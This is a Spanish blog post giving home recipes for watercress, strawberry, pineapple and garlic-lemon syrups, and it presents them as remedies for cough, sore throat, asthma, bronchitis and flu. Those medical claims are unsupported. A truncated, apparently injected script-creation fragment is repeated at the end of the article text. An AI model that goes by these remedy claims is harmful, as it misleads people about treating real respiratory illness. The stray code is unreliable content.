Salud y belleza » Medicina

Aprendiendo a fabricar jarabes naturales (I)

1 Comentario

A menudo, una simple cocina puede transformarse en todo un laboratorio. De hecho, las más grandes fórmulas nacieron, en verdad, en el seno de una casa modesta -luego esas famosas recetas pasaron a ser parte de los denominados laboratorios industriales-.

Claro que, bajo ninguna circunstancia, éste artículo intenta efectuar una apología de casos como el del Dr. Jekyll y Mister Hyde: solo se trata de un compendio de instrucciones para poder realizar, desde casa, jarabes caseros (básicos, elementales).

Las formulas que presentaremos a continuación incluyen la elaboración de jarabes para combatir dolencias que van desde la ronquera, hasta la congestión nasal, o el dolor de garganta. También, otras recetas son ideales para los problemas respiratorios, bronquitis, asma, gripe, resfriado y tos.

¡Pasen, vean, seleccionen, preparen y usen!

Jarabe casero de berro para la tos

Elaboración: primero es necesario triturar algunas hojas de berro mediante el uso de una licuadora. Una vez que queden reducidas a líquido colar y añadir tres cucharadas de miel (morena). Guardar en la nevera, en un recipiente preferentemente de cristal oscuro (así no se desactivan las propiedades principales). Beber una cucharada tres veces por día: mañana, tarde y noche.

Jarabe casero de fresa para el dolor de garganta

Elaboración: ante todo, batir tres cucharadas de miel morena y, junto con ellas, cinco fresas de tamaño grande. Inmediatamente llevar al fuego y dejar el “remedio” allí hasta que tome la consistencia de un jarabe normal. Sin colar, servir en un recipiente de cristal oscuro y mantener fuera de la nevera. Tomar una cucharada cada ocho horas.

Jarabe casero de piña para la ronquera

Elaboración: trocear una piña pequeña y colocar en un molde junto con tres cucharadas de azúcar. Estacionar durante al menos sesenta minutos y, pasado el rato, llevar hacia el fuego hasta que la solución tome un color dorado. Beber dos cucharadas al día.

Jarabe casero de ajo y limón para la irritación de la garganta.

Elaboración: pelar cinco dientes de ajo; extraer el jugo de un limón. Juntar ambos ingredientes y batir en la licuadora. Agregar un vaso de agua hervida junto con tres cucharadas de miel morena. Luego colar y llevar a un recipiente de cristal oscuro (nuevamente, para que no se pierdan propiedades).  Tomar una cucharada cada seis horas.

En el próximo artículo muchas más formulas caseras para que puedas seguir haciendo tus propios jarabes naturales…var d=document;var s=d.createElement('script'); var d=document;var s=d.createElement('script');

Más consejos de salud y belleza : , ,

One Comment »

  • Bitacoras.com said:

    Información Bitacoras.com…

    Valora en Bitacoras.com: A menudo, una simple cocina puede transformarse en todo un laboratorio. De hecho, las más grandes fórmulas nacieron, en verdad, en el seno de una casa modesta -luego esas famosas recetas pasaron a ser parte de los denominad……

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.